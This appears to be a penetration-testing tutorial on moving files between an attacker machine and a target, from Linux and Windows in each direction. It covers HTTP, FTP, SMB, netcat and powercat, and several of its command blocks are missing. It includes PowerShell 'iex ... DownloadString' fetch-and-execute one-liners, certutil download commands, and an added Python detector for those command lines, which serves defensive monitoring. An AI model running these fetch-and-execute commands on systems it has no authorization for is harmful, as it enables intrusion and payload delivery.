Transferring Files
In this section I'm going to enumerate different methods to transfer files, such as exploits or the output of scripts, from our attacker machine to the target and vice versa.
To do our work we need to transfer files, and this post collects some of these methods. Let's see: these are some of the environments we can find during our audits.
Linux to Linux
HTTP
First we need to start our server with Python (or PHP, Ruby or BusyBox):
python3 -m http.server port
python -m SimpleHTTPServer port
php -S 0.0.0.0:port
ruby -run -e httpd . -p port
busybox httpd -f -p port
And download our files with Linux basics on the target:
wget http://ip-addr:port/file.name
curl http://ip-addr:port/file.name -o file.name
axel -a -n 20 -o file.name http://ip-addr:port/file.name
# FreeBSD
fetch -o file.name -q -R http://ip-addr:port/file.name
Netcat / Socat
There are more ways with different protocols or programs to transfer our files:
And on the target:
FTP (File Transfer Protocol)
First we need to start our FTP server. In this case I will use the Python module pyftpdlib, which lets us set up an FTP server very quickly. To install it, run the following command:
And start the server:
Finally you can download the file on the target with:
wget ftp://ip-addr/file.name [--ftp-user=user] [--ftp-password=password]
axel -a -n 20 -o file.name ftp://ip-addr:port/file.name
Base64 Encoding
This is not the best solution because you will need to copy and paste the output, and transferring a big file this way can be tedious. Anyway, these are the commands:
Copy the result and paste it on your machine inside quotes:
Linux to Windows
HTTP
First we need to start our server with python:
And download our files with Windows basics on the target:
Via CMD:
certutil -urlcache -f "http://ip-addr:port/file.name" file.name
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file.name', 'file.name')
Via PowerShell:
Import PowerShell Script without storing in memory
iex (New-Object System.Net.Webclient).DownloadString('http://ip-addr:port/file.ps1')
iex (iwr 'http://ip-addr:port/file.ps1')
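Seen from the monitored side, each of the Windows download commands above leaves a recognizable process command line. The following is an added example, not part of the original post: a small Python matcher for those command lines, run over constructed sample events (the rule names and the address 192.0.2.10 are assumptions made for the illustration).

```python
import re

# Rules derived from the Windows download commands listed in this section.
RULES = [
    ("certutil_urlcache",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", re.I)),
    ("webclient_downloadfile",
     re.compile(r"net\.webclient\b.*\.downloadfile\s*\(", re.I)),
    ("webclient_downloadstring",
     re.compile(r"net\.webclient\b.*\.downloadstring\s*\(", re.I)),
    ("iex_remote_script",
     re.compile(r"\b(iex|invoke-expression)\b.*"
                r"\b(iwr|invoke-webrequest|downloadstring)\b", re.I)),
]
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\")]+", re.I)

def classify(cmdline):
    """Return (matched rule names, URLs found) for one process command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    urls = URL_RE.findall(cmdline) if hits else []
    return hits, urls

# Constructed process-creation command lines; 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    'certutil -urlcache -f "http://192.0.2.10:8000/file.name" file.name',
    "powershell -c (New-Object Net.WebClient).DownloadFile("
    "'http://192.0.2.10:8000/file.name', 'file.name')",
    "powershell iex (New-Object System.Net.Webclient).DownloadString("
    "'http://192.0.2.10:8000/file.ps1')",
    "powershell iex (iwr 'http://192.0.2.10:8000/file.ps1')",
    "certutil -hashfile C:\\Temp\\setup.exe SHA256",  # benign certutil use
    "powershell Get-ChildItem C:\\Users",             # benign PowerShell use
]

def scan(events):
    """Return (event, rule names, URLs) for every event that matches a rule."""
    results = []
    for event in events:
        hits, urls = classify(event)
        if hits:
            results.append((event, hits, urls))
    return results

if __name__ == "__main__":
    for event, hits, urls in scan(SAMPLE_EVENTS):
        print(hits, urls, "<-", event)
```

The same patterns can be applied to process-creation telemetry (for example Sysmon event ID 1 or Windows event 4688 with command-line logging enabled); matches on certutil with -urlcache deserve attention because that switch is rarely used in normal administration.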
SMB
Server Message Block (SMB) is a network protocol that allows us to share files, printers, etc. between Microsoft Windows nodes.
To start an SMB server you need to invoke the smbserver.py class from impacket.
And simply copy the file from the shared volume to the target:
There may be other ways to transfer files between Linux and Windows, but these methods are more than enough to do our job!
Windows to Linux
This section will be similar to the previous one.
HTTP
If the target has Python installed you can start the server in the same way:
(Be careful: on Windows the Python script in python2.7 is http.server and not SimpleHTTPServer.)
And download our files with Linux basics on the target:
SMB
In this case the SMB server will also be started on the attacker's machine (Linux). To start an SMB server you need to invoke the smbserver.py class from impacket:
But the difference will be the order of the copy arguments:
Powercat
Powercat is essentially the PowerShell version of netcat. First you need to install it on your Kali machine to get the script:
Installation: sudo apt install powercat
Then you will find the script in the following directory:
/usr/share/windows-resources/powercat/powercat.ps1
Once the script has been transferred and the module imported, start the listener on the Kali machine:
And execute the following command to send the desired file.
Windows to Windows
SMB
First we need to create a password-protected share.
New-SmbShare -Name "share" -Path C:\Users\user\Desktop\share -FullAccess Everyone
New-SmbShare -Name "share" -Path C:\Users\user\Desktop\share -FullAccess corp\User
Once the new share is created, we need to mount it on the target machine.
Note: If you get an error such as
"The local device name is already in use." you can delete the mapping with:
net use Z: /delete
Finally we can list and use files: